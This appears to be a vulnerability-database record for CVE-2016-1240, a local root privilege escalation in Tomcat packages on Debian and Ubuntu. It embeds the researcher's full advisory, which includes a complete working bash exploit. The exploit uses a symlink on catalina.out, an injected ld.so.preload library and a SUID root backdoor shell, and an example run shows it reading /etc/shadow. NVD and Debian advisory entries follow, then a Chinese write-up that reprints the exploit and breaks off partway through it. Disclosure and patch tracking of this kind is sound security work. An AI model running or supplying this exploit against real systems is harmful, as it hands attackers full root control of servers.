{"lastseen": "2016-10-04T09:29:12", "osvdbidlist": [], "references": [], "description": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation. CVE-2016-1240. Local exploit for Linux platform", "reporter": "Dawid Golunski", "published": "2016-10-03T00:00:00", "type": "exploitdb", "title": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation", "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2016-10-04T09:29:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-1240"]}, {"type": "openvas", "idList": ["OPENVAS:703670", "OPENVAS:1361412562310703670", "OPENVAS:703669", "OPENVAS:1361412562310703669", "OPENVAS:1361412562310842892"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3670-1:7364A", "DEBIAN:DLA-622-1:61A2B", "DEBIAN:DLA-623-1:9251E", "DEBIAN:DSA-3669-1:CFB19"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2017-0455.NASL", "UBUNTU_USN-3081-1.NASL", "GENTOO_GLSA-201705-09.NASL", "DEBIAN_DLA-623.NASL", "DEBIAN_DSA-3670.NASL", "DEBIAN_DLA-622.NASL", "DEBIAN_DSA-3669.NASL", "REDHAT-RHSA-2017-0456.NASL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201679941"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1B5B3B594F0BEB22BF053920EF4C7307"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138940"]}, {"type": "zdt", "idList": ["1337DAY-ID-25101"]}, {"type": "seebug", "idList": ["SSV:92455"]}, {"type": "ubuntu", "idList": ["USN-3081-1"]}, {"type": "redhat", "idList": ["RHSA-2017:0457", "RHSA-2017:0455", "RHSA-2017:0456"]}, {"type": "gentoo", "idList": ["GLSA-201705-09"]}], "modified": "2016-10-04T09:29:12", "rev": 2}, "vulnersScore": 2.6}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1240"], "modified": "2016-10-03T00:00:00", "id": "EDB-ID:40450", "href": "https://www.exploit-db.com/exploits/40450/", "viewCount": 307, "sourceData": "=============================================\r

- Discovered by: Dawid Golunski\r

- http://legalhackers.com\r

- dawid (at) legalhackers.com\r

\r

- CVE-2016-1240\r

- Release date: 30.09.2016\r

- Revision: 1\r

- Severity: High\r

=============================================\r

\r

\r

I. VULNERABILITY\r

-------------------------\r

\r

Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation\r

\r

Affected debian packages:\r

\r

Tomcat 8 <= 8.0.36-2 \r

Tomcat 7 <= 7.0.70-2 \r

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1\r

\r

Ubuntu systems are also affected. See section VII. for details.\r

Other systems using the affected debian packages may also be affected.\r

\r

\r

II. BACKGROUND\r

-------------------------\r

\r

\"The Apache Tomcat\u00ae software is an open source implementation of the \r

Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \r

technologies. The Java Servlet, JavaServer Pages, Java Expression Language \r

and Java WebSocket specifications are developed under the Java Community \r

Process.\r

\r

The Apache Tomcat software is developed in an open and participatory \r

environment and released under the Apache License version 2. \r

The Apache Tomcat project is intended to be a collaboration of the \r

best-of-breed developers from around the world.\r

\r

Apache Tomcat software powers numerous large-scale, mission-critical web \r

applications across a diverse range of industries and organizations. \r

Some of these users and their stories are listed on the PoweredBy wiki page.\r

\"\r

\r

http://tomcat.apache.org/\r

\r

\r

III. INTRODUCTION\r

-------------------------\r

\r

Tomcat (6, 7, 8) packages provided by default repositories on Debian-based \r

distributions (including Debian, Ubuntu etc.) provide a vulnerable\r

tomcat init script that allows local attackers who have already gained access \r

to the tomcat account (for example, by exploiting an RCE vulnerability\r

in a java web application hosted on Tomcat, uploading a webshell etc.) to\r

escalate their privileges from tomcat user to root and fully compromise the \r

target system.\r

\r

IV. DESCRIPTION\r

-------------------------\r

\r

The vulnerability is located in the tomcat init script provided by affected\r

packages, normally installed at /etc/init.d/tomcatN. \r

\r

The script for tomcat7 contains the following lines:\r

\r

-----[tomcat7]----\r

\r

# Run the catalina.sh script as a daemon\r

set +e\r

touch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r

chown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r

\r

-------[eof]------\r

\r

Local attackers who have gained access to the server in the context of the\r

tomcat user (for example, through a vulnerability in a web application) would \r

be able to replace the log file with a symlink to an arbitrary system file \r

and escalate their privileges to root once the Tomcat init script (running as root)\r

re-opens the catalina.out file after a service restart, reboot etc.\r

\r

As attackers would already have a tomcat account at the time of exploitation,\r

they could also kill the tomcat processes to introduce the need for a restart.\r

\r

\r

V. PROOF OF CONCEPT EXPLOIT\r

-------------------------\r

\r

------[ tomcat-rootprivesc-deb.sh ]------\r

\r

#!/bin/bash\r

#\r

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r

#\r

# CVE-2016-1240\r

#\r

# Discovered and coded by:\r

#\r

# Dawid Golunski\r

# http://legalhackers.com\r

#\r

# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r

# Debian-based distros including Debian, Ubuntu etc.\r

# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r

# vulnerable java webapp, or locally via weak permissions on webapps in the \r

# Tomcat webroot directories etc.) to escalate their privileges to root.\r

#\r

# Usage:\r

# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r

#\r

# The exploit can be used in two ways:\r

#\r

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r

# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \r

# It also gives the attacker a chance to execute the kill [tomcat-pid] command to force/speed up\r

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r

#\r

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r

# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r

# then add arbitrary commands to the file which will be executed with root privileges by \r

# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r

# Ubuntu/Debian Tomcat installations).\r

#\r

# See full advisory for details at:\r

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r

#\r

# Disclaimer:\r

# For testing purposes only. Do no harm.\r

#\r

\r

BACKDOORSH=\"/bin/bash\"\r

BACKDOORPATH=\"/tmp/tomcatrootsh\"\r

PRIVESCLIB=\"/tmp/privesclib.so\"\r

PRIVESCSRC=\"/tmp/privesclib.c\"\r

SUIDBIN=\"/usr/bin/sudo\"\r

\r

function cleanexit {\r

\t# Cleanup \r

\techo -e \"\

[+] Cleaning up...\"\r

\trm -f $PRIVESCSRC\r

\trm -f $PRIVESCLIB\r

\trm -f $TOMCATLOG\r

\ttouch $TOMCATLOG\r

\tif [ -f /etc/ld.so.preload ]; then\r

\t\techo -n > /etc/ld.so.preload 2>/dev/null\r

\tfi\r

\techo -e \"\

[+] Job done. Exiting with code $1 \

\"\r

\texit $1\r

}\r

\r

function ctrl_c() {\r

echo -e \"\

[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r

\tcleanexit 0\r

}\r

\r

#intro \r

echo -e \"\\033[94m \

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\

CVE-2016-1240\

\"\r

echo -e \"Discovered and coded by: \

\

Dawid Golunski \

http://legalhackers.com \\033[0m\"\r

\r

# Args\r

if [ $# -lt 1 ]; then\r

\techo -e \"\

[!] Exploit usage: \

\

$0 path_to_catalina.out [-deferred]\

\"\r

\texit 3\r

fi\r

if [ \"$2\" = \"-deferred\" ]; then\r

\tmode=\"deferred\"\r

else\r

\tmode=\"active\"\r

fi\r

\r

# Priv check\r

echo -e \"\

[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \

`id`\"\r

id | grep -q tomcat\r

if [ $? -ne 0 ]; then\r

\techo -e \"\

[!] You need to execute the exploit as tomcat user! Exiting.\

\"\r

\texit 3\r

fi\r

\r

# Set target paths\r

TOMCATLOG=\"$1\"\r

if [ ! -f $TOMCATLOG ]; then\r

\techo -e \"\

[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\

\"\r

\texit 3\r

fi\r

echo -e \"\

[+] Target Tomcat log file set to $TOMCATLOG\"\r

\r

# [ Deferred exploitation ]\r

\r

# Symlink the log file to /etc/default/locale file which gets executed daily on default\r

# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r

# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r

# restarted and file owner gets changed.\r

if [ \"$mode\" = \"deferred\" ]; then\r

\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r

\tif [ $? -ne 0 ]; then\r

\t\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r

\t\tcleanexit 3\r

\tfi\r

\techo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"\r

\techo -e \"\

[+] The current owner of the file is: \

`ls -l /etc/default/locale`\"\r

\techo -ne \"\

[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"\r

\techo -ne \"\

you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r

\techo -ne \"\

at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\

\

\"\r

\texit 0\r

fi\r

\r

# [ Active exploitation ]\r

\r

trap ctrl_c INT\r

# Compile privesc preload library\r

echo -e \"\

[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r

cat <<_solibeof_>$PRIVESCSRC\r

#define _GNU_SOURCE\r

#include <stdio.h>\r

#include <sys/stat.h>\r

#include <unistd.h>\r

#include <dlfcn.h>\r

uid_t geteuid(void) {\r

\tstatic uid_t (*old_geteuid)();\r

\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r

\tif ( old_geteuid() == 0 ) {\r

\t\tchown(\"$BACKDOORPATH\", 0, 0);\r

\t\tchmod(\"$BACKDOORPATH\", 04777);\r

\t\tunlink(\"/etc/ld.so.preload\");\r

\t}\r

\treturn old_geteuid();\r

}\r

_solibeof_\r

gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r

if [ $? -ne 0 ]; then\r

\techo -e \"\

[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r

\tcleanexit 2;\r

fi\r

\r

# Prepare backdoor shell\r

cp $BACKDOORSH $BACKDOORPATH\r

echo -e \"\

[+] Backdoor/low-priv shell installed at: \

`ls -l $BACKDOORPATH`\"\r

\r

# Safety check\r

if [ -f /etc/ld.so.preload ]; then\r

\techo -e \"\

[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r

\tcleanexit 2\r

fi\r

\r

# Symlink the log file to ld.so.preload\r

rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r

if [ $? -ne 0 ]; then\r

\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r

\tcleanexit 3\r

fi\r

echo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"\r

\r

# Wait for Tomcat to re-open the logs\r

echo -ne \"\

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r

echo -e \"\

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r

while :; do \r

\tsleep 0.1\r

\tif [ -f /etc/ld.so.preload ]; then\r

\t\techo $PRIVESCLIB > /etc/ld.so.preload\r

\t\tbreak;\r

\tfi\r

done\r

\r

# /etc/ld.so.preload file should be owned by tomcat user at this point\r

# Inject the privesc.so shared library to escalate privileges\r

echo $PRIVESCLIB > /etc/ld.so.preload\r

echo -e \"\

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \

`ls -l /etc/ld.so.preload`\"\r

echo -e \"\

[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r

echo -e \"\

[+] The /etc/ld.so.preload file now contains: \

`cat /etc/ld.so.preload`\"\r

\r

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r

echo -e \"\

[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r

sudo --help 2>/dev/null >/dev/null\r

\r

# Check for the rootshell\r

ls -l $BACKDOORPATH | grep rws | grep -q root\r

if [ $? -eq 0 ]; then \r

\techo -e \"\

[+] Rootshell got assigned root SUID perms at: \

`ls -l $BACKDOORPATH`\"\r

\techo -e \"\

\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r

else\r

\techo -e \"\

[!] Failed to get root\"\r

\tcleanexit 2\r

fi\r

\r

# Execute the rootshell\r

echo -e \"\

[+] Executing the rootshell $BACKDOORPATH now! \

\"\r

$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r

$BACKDOORPATH -p\r

\r

# Job done.\r

cleanexit 0\r

\r

--------------[ EOF ]--------------------\r

\r

\r

\r

Example exploit run:\r

~~~~~~~~~~~~~~\r

\r

tomcat7@ubuntu:/tmp$ id\r

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r

\r

tomcat7@ubuntu:/tmp$ lsb_release -a\r

No LSB modules are available.\r

Distributor ID:\tUbuntu\r

Description:\tUbuntu 16.04 LTS\r

Release:\t16.04\r

Codename:\txenial\r

\r

tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat\r

ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r

ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r

ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r

\r

tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \r

\r

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r

CVE-2016-1240\r

\r

Discovered and coded by: \r

\r

Dawid Golunski \r

http://legalhackers.com \r

\r

[+] Starting the exploit in [active] mode with the following privileges: \r

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r

\r

[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r

\r

[+] Compiling the privesc shared library (/tmp/privesclib.c)\r

\r

[+] Backdoor/low-priv shell installed at: \r

-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r

\r

[+] Symlink created at: \r

lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r

\r

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r

\r

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \r

-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r

\r

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r

\r

[+] The /etc/ld.so.preload file now contains: \r

/tmp/privesclib.so\r

\r

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r

\r

[+] Rootshell got assigned root SUID perms at: \r

-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r

\r

Please tell me you're seeing this too ;) \r

\r

[+] Executing the rootshell /tmp/tomcatrootsh now! \r

\r

tomcatrootsh-4.3# id\r

uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r

tomcatrootsh-4.3# whoami\r

root\r

tomcatrootsh-4.3# head -n3 /etc/shadow\r

root:$6$oaf[cut]:16912:0:99999:7:::\r

daemon:*:16912:0:99999:7:::\r

bin:*:16912:0:99999:7:::\r

tomcatrootsh-4.3# exit\r

exit\r

\r

[+] Cleaning up...\r

\r

[+] Job done. Exiting with code 0 \r

\r

\r

\r

VI. BUSINESS IMPACT\r

-------------------------\r

\r

Local attackers who have gained access to tomcat user account (for example \r

remotely via a vulnerable web application, or locally via weak webroot perms),\r

could escalate their privileges to root and fully compromise the affected system.\r

\r

\r

VII. SYSTEMS AFFECTED\r

-------------------------\r

\r

The following Debian package versions are affected:\r

\r

Tomcat 8 <= 8.0.36-2\r

Tomcat 7 <= 7.0.70-2\r

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1\r

\r

More detailed lists of affected packages can be found at:\r

\r

Debian:\r

https://security-tracker.debian.org/tracker/CVE-2016-1240\r

\r

Ubuntu:\r

http://www.ubuntu.com/usn/usn-3081-1/\r

\r

Other systems that use Tomcat packages provided by Debian may also be affected.\r

\r

\r

VIII. SOLUTION\r

-------------------------\r

\r

The Debian Security Team was contacted and has fixed the affected upstream packages.\r

Update to the latest tomcat packages provided by your distribution.\r

\r

IX. REFERENCES\r

-------------------------\r

\r

http://legalhackers.com\r

\r

http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r

\r

The exploit's sourcecode\r

http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r

\r

CVE-2016-1240\r

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r

\r

Ubuntu Security Notice USN-3081-1:\r

http://www.ubuntu.com/usn/usn-3081-1/\r

\r

Debian Security Advisory DSA-3669-1 (tomcat7):\r

https://lists.debian.org/debian-security-announce/2016/msg00249.html\r

https://www.debian.org/security/2016/dsa-3669\r

\r

Debian Security Advisory DSA-3670-1 (tomcat8):\r

https://www.debian.org/security/2016/dsa-3670\r

\r

https://security-tracker.debian.org/tracker/CVE-2016-1240\r

\r

\r

X. CREDITS\r

-------------------------\r

\r

The vulnerability has been discovered by Dawid Golunski\r

dawid (at) legalhackers (dot) com\r

http://legalhackers.com\r

\r

XI. REVISION HISTORY\r

-------------------------\r

\r

30.09.2016 - Advisory released\r

\r

XII. LEGAL NOTICES\r

-------------------------\r

\r

The information contained within this advisory is supplied \"as-is\" with\r

no warranties or guarantees of fitness of use or otherwise. I accept no\r

responsibility for any damage caused by the use or misuse of this information.", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "sourceHref": "https://www.exploit-db.com/download/40450/"}

{"cve": [{"lastseen": "2020-09-21T14:24:30", "description": "The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-03T15:59:00", "title": "CVE-2016-1240", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1240"], "modified": "2018-10-09T19:59:00", "cpe": ["cpe:/a:apache:tomcat:8.0", "cpe:/a:apache:tomcat:7.0", "cpe:/a:apache:tomcat:6.0"], "id": "CVE-2016-1240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1240", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:apache:tomcat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2020-08-12T00:52:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "- -------------------------------------------------------------------------

Debian Security Advisory DSA-3669-1 security@debian.org

https://www.debian.org/security/ Moritz Muehlenhoff

September 15, 2016 https://www.debian.org/security/faq

- -------------------------------------------------------------------------



Package : tomcat7

CVE ID : CVE-2016-1240



Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.



For the stable distribution (jessie), this problem has been fixed in

version 7.0.56-3+deb8u4.



We recommend that you upgrade your tomcat7 packages.



Further information about Debian Security Advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://www.debian.org/security/



Mailing list: debian-security-announce@lists.debian.org

", "edition": 8, "modified": "2016-09-15T17:27:26", "published": "2016-09-15T17:27:26", "id": "DEBIAN:DSA-3669-1:CFB19", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00248.html", "title": "[SECURITY] [DSA 3669-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "Package : tomcat7

Version : 7.0.28-4+deb7u6

CVE ID : CVE-2016-1240





Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 7 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat7 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt



In addition this security update also fixes Debian bug #821391. File

ownership in /etc/tomcat7 will no longer be unconditionally overridden

on upgrade. As another precaution the file permissions of Debian

specific configuration files in /etc/tomcat7 were changed to 640 to

disallow world readable access.



For Debian 7 "Wheezy", these problems have been fixed in version

7.0.28-4+deb7u6.



We recommend that you upgrade your tomcat7 packages.



Further information about Debian LTS security advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://wiki.debian.org/LTS

", "edition": 3, "modified": "2016-09-15T15:08:18", "published": "2016-09-15T15:08:18", "id": "DEBIAN:DLA-623-1:9251E", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00016.html", "title": "[SECURITY] [DLA 623-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "Package : tomcat6

Version : 6.0.45+dfsg-1~deb7u2

CVE ID : CVE-2016-1240







Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 6 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat6 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt



For Debian 7 "Wheezy", these problems have been fixed in version

6.0.45+dfsg-1~deb7u2.



We recommend that you upgrade your tomcat6 packages.



Further information about Debian LTS security advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://wiki.debian.org/LTS

", "edition": 3, "modified": "2016-09-15T14:47:02", "published": "2016-09-15T14:47:02", "id": "DEBIAN:DLA-622-1:61A2B", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00015.html", "title": "[SECURITY] [DLA 622-1] tomcat6 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:47:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "- -------------------------------------------------------------------------

Debian Security Advisory DSA-3670-1 security@debian.org

https://www.debian.org/security/ Moritz Muehlenhoff

September 15, 2016 https://www.debian.org/security/faq

- -------------------------------------------------------------------------



Package : tomcat8

CVE ID : CVE-2016-1240



Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.



For the stable distribution (jessie), this problem has been fixed in

version 8.0.14-1+deb8u3.



For the unstable distribution (sid), this problem will be fixed soon.



We recommend that you upgrade your tomcat8 packages.



Further information about Debian Security Advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://www.debian.org/security/



Mailing list: debian-security-announce@lists.debian.org

", "edition": 8, "modified": "2016-09-15T17:28:15", "published": "2016-09-15T17:28:15", "id": "DEBIAN:DSA-3670-1:7364A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00249.html", "title": "[SECURITY] [DSA 3670-1] tomcat8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2016-10-29T18:03:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-1240"], "edition": 1, "description": "Just as National Day was being celebrated, on October 1 a local privilege escalation vulnerability in Tomcat, CVE-2016-1240, was disclosed. With nothing more than a low-privileged Tomcat user account, an attacker can use the vulnerability to obtain system ROOT privileges. Exploiting the vulnerability is not difficult, so affected users need to pay special attention.

Tomcat is an application server that runs alongside Apache and provides a container for Servlet/JSP applications. Tomcat can be treated as an extension of Apache, but in fact it can also run independently of Apache.


Vulnerability ID:

CVE-2016-1240

Affect range:

Tomcat 8

Tomcat 7

Tomcat 6

Affected systems include Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected.

Repair solutions:

The Debian security team has fixed the affected packages; update to the latest Tomcat package version provided by your system.

Vulnerability overview:

Administrators of Debian-based Linux systems typically use apt-get for package management. CVE-2016-1240 is a problem in the Tomcat deb package: installing Tomcat from the deb package automatically installs, as the administrator, a startup script at /etc/init.d/tomcat*, and this script can let an attacker with a low-privileged Tomcat user account obtain system root privileges!

# Run the catalina.sh script as a daemon

set +e

touch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out

chown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out

A local attacker running as the tomcat user (for example, after exploiting a web application vulnerability) can replace catalina.out with a symlink pointing to any file on the system; once the Tomcat init script, running as ROOT, re-opens the catalina.out file after a service restart, the attacker can obtain ROOT privileges.

Vulnerability PoC:

#!/bin/bash

#

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

#

# CVE-2016-1240

#

# Discovered and coded by:

#

# Dawid Golunski

# http://legalhackers.com

#

# This exploit targets the Tomcat (versions 6, 7 and 8) packaging on

# Debian-based distros including Debian, Ubuntu etc.

# It allows attackers with a tomcat shell (e.g. obtained remotely through a

# vulnerable java webapp, or locally via weak permissions on webapps in the

# Tomcat webroot directories etc.) to escalate their privileges to root.

#

# Usage:

# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]

#

# The exploit can be used in two ways:

#

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly

# gains/executes a rootshell via ld.so.preload as soon as the Tomcat service is restarted.

# It also gives the attacker a chance to execute the kill [tomcat-pid] command to force/speed up

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

#

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to

# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can

# then add arbitrary commands to the file which will be executed with root privileges by

# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default

# Ubuntu/Debian Tomcat installations).

#

# See full advisory for details at:

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

#

# Disclaimer:

# For testing purposes only. Do no harm.

#

BACKDOORSH=\"/bin/bash\"

BACKDOORPATH=\"/tmp/tomcatrootsh\"

PRIVESCLIB=\"/tmp/privesclib.so\"

PRIVESCSRC=\"/tmp/privesclib.c\"

SUIDBIN=\"/usr/bin/sudo\"

function cleanexit {

# Cleanup

echo -e \"\

[+] Cleaning up...\"

rm -f $PRIVESCSRC

rm -f $PRIVESCLIB

rm -f $TOMCATLOG

touch $TOMCATLOG

if [ -f /etc/ld.so.preload ]; then

echo -n > /etc/ld.so.preload 2>/dev/null

fi

echo -e \"\

[+] Job done. Exiting with code $1 \

\"

exit $1

}

function ctrl_c() {

echo -e \"\

[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"

cleanexit 0

}

#intro

echo -e \"\\033[94m \

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\

CVE-2016-1240\

\"

echo -e \"Discovered and coded by: \

\

Dawid Golunski \

http://legalhackers.com \\033[0m\"

# Args

if [ $# -lt 1 ]; then

echo -e \"\

[!] Exploit usage: \

\

